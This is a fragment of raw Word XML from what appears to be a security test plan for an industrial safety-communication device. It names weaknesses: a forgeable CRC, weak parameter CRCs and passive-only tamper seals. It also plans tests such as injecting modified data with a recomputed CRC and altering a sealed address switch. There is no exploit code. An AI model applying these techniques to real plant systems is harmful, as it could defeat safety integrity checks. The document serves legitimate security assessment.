          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72723">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="00AB44FC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FF72C0" w:rsidRPr="00FF72C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF72C0" w:rsidRPr="00FF72C0">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The CRC is a checksum, not a MAC. With a public, non-secret seed an attacker who modifies the payload and recomputes a valid CRC is not detected</w:t>
      </w:r>
      <w:r w:rsidR="00FF72C0">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FF72C0" w:rsidRPr="00FF72C0">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>protection against accidental but not intentional corruption. (prEN 50742 §7.4.3.4 would require SRSL3 cryptographic integrity for this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59226C" w14:textId="55A51323" w:rsidR="007C3336" w:rsidRDefault="007C3336">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3336">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="00AB44FC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009C7993" w:rsidRPr="009C7993">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Same limitation for iParCRC/F_ParCRC. F_ParCRC is only 16-bit (a 2¹⁶ space</w:t>
      </w:r>
      <w:r w:rsidR="009C7993">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009C7993" w:rsidRPr="009C7993">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no forgery resistance); iParCRC is 32-bit but still non-cryptographic and recomputable from the public layout.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3336">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF6169" w14:textId="11E7284E" w:rsidR="002014CB" w:rsidRDefault="002014CB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002014CB">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="00AB44FC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0002202F" w:rsidRPr="0002202F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The seals provide passive, visual tamper-resistance only; there is no active tamper-detection that triggers a protective response (EDR 3.11 detection limb unmet). The one genuine device-level protection is temporal (switch read only at Init): the running address cannot be corrupted live, but the stored/next-boot address can be, with the seal as the sole barrier.</w:t>
      </w:r>
      <w:r w:rsidR="0002202F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75903E39" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216434DD" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE21217" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC13A6F" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C17912" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124B7706" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5343A78B" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640B6D76" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEC16E3" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2032510B" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6CA68A" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286DBC56" w14:textId="77777777" w:rsidR="0002202F" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476A0A78" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="00DA402C" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B003CC" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle5dunkelAkzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="390"/>
        <w:gridCol w:w="3920"/>
        <w:gridCol w:w="1937"/>
        <w:gridCol w:w="2089"/>
        <w:gridCol w:w="952"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA2AAB" w14:paraId="0853BE28"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B45649A" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7031406F"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2C81D005"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0B1626A9"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6BD5E8E0"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CA2AAB" w:rsidRPr="007F5798" w14:paraId="6770D1D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FB2C3D9" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42080B59" w14:textId="77777777" w:rsidR="0051309A" w:rsidRPr="003836CB"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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Present a configuration with a wrong iParCRC / F_ParCRC; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="581021F7" w14:textId="4E698B0B" w:rsidR="00CA2AAB" w:rsidRPr="003836CB"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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>verify rejection (EC3, stays in Parametrization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF3DB2A" w14:textId="1A1F7199" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="00CF5F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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional CR 3.4 in normal operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F2BE3AE" w14:textId="56F4C79B" w:rsidR="00CA2AAB" w:rsidRPr="006868A2" w:rsidRDefault="00410D7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868A2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21CA42C9" w14:textId="206079EE" w:rsidR="00CA2AAB" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="00D258C9" w14:paraId="6F00E58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2E0CA0" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77A73DD3" w14:textId="2AC770B6" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="005603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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bit-flip the payload leaving CRC stale → CRC mismatch → passivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65FBB07A" w14:textId="1DD88411" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="0077480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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Effectiveness of the CRC countermeasure under fault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796F68C4" w14:textId="77777777" w:rsidR="003F5E54" w:rsidRPr="0048644C" w:rsidRDefault="0057680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644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §5.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03AE16A9" w14:textId="04562FAB" w:rsidR="00CA2AAB" w:rsidRPr="00A74DE8" w:rsidRDefault="0057680B"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8644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PROFIsafe CRC theory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A7F8CE" w14:textId="79E85ABA" w:rsidR="00CA2AAB" w:rsidRPr="0048644C"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644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="00D0764E" w14:paraId="10A4136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0716A92" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BFED928" w14:textId="2AD299D7" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="005D011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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Recompute a VALID CRC over MODIFIED process data and inject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ADDA415" w14:textId="25FC8A05" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="006652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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1: intentional corruption undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="781963F3" w14:textId="30A13E81" w:rsidR="001742D7" w:rsidRPr="001742D7" w:rsidRDefault="003B0E8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742D7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0836</w:t>
            </w:r>
            <w:r w:rsidR="00A80319">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00A80319">
              <w:t xml:space="preserve"> T1682</w:t>
            </w:r>
            <w:r w:rsidRPr="001742D7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4483687F" w14:textId="037D46FF" w:rsidR="00CA2AAB" w:rsidRDefault="003B0E8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8644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154A6E37" w14:textId="77777777" w:rsidR="003B0E8D" w:rsidRDefault="003B0E8D" w:rsidP="003B0E8D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D87C080" w14:textId="7C074317" w:rsidR="003B0E8D" w:rsidRPr="003B0E8D" w:rsidRDefault="003B0E8D" w:rsidP="003B0E8D">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BF0D18E" w14:textId="67290941" w:rsidR="00CA2AAB" w:rsidRPr="0048644C"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8644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="00035F89" w14:paraId="5E071743"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187F4D0" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C7861C" w14:textId="079C372E" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="0038791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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F_ParCRC forgery feasibility</w:t>
            </w:r>
            <w:r w:rsidR="009216D9" w:rsidRPr="003836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="003836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>analyse the 16-bit F_ParCRC / 32-bit iParCRC forgeability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C70C302" w14:textId="77BE60F1" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="009E19B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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2: parameter CRCs are not authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF5D2B5" w14:textId="39E2787C" w:rsidR="00CA2AAB" w:rsidRPr="001D22FB" w:rsidRDefault="00B82273" w:rsidP="00D83F57">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644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DA13F52" w14:textId="25369D3D" w:rsidR="00CA2AAB" w:rsidRPr="0048644C"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644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA2AAB" w:rsidRPr="008171E4" w14:paraId="4448F07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1144386" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E4E8537" w14:textId="3BC82A64" w:rsidR="00FE2A16" w:rsidRPr="003836CB"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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Physical tamper-resistance: remove seal, alter rotary switch, reboot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404846C8" w14:textId="1FE040AC" w:rsidR="00FE2A16" w:rsidRPr="003836CB"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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(a) runtime change is ignored </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A51BA5" w14:textId="791DBB3B" w:rsidR="00CA2AAB" w:rsidRPr="003836CB"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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(b) the next-boot address can be corrupted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37229343" w14:textId="304CC40F" w:rsidR="00CA2AAB" w:rsidRPr="003836CB" w:rsidRDefault="0023488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836CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-3 (resistance-only physical protection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B836832" w14:textId="77777777" w:rsidR="006868A2" w:rsidRPr="00A041E4"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041E4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP ISTG ISTG-PHY; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="447830CE" w14:textId="65F94DB0" w:rsidR="00CA2AAB" w:rsidRPr="000212BF"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212BF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">EDR 3.11 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F522E8" w14:textId="1C1E9BC5" w:rsidR="00CA2AAB" w:rsidRPr="0048644C"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8644C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SVV-4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5432C892" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308E82F3" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664275F2" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB3C4AB" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="2"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r w:rsidR="005D11F1" w:rsidRPr="00DB074F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C5023" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EE511B" w14:textId="77A4511A" w:rsidR="00C9536C" w:rsidRPr="00690A16" w:rsidRDefault="00C9536C" w:rsidP="00C9536C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690A16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ002-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00690A16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameter-CRC Rejection (iParCRC / F_ParCRC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FCC64" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675EF02F"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4A8090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312134" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
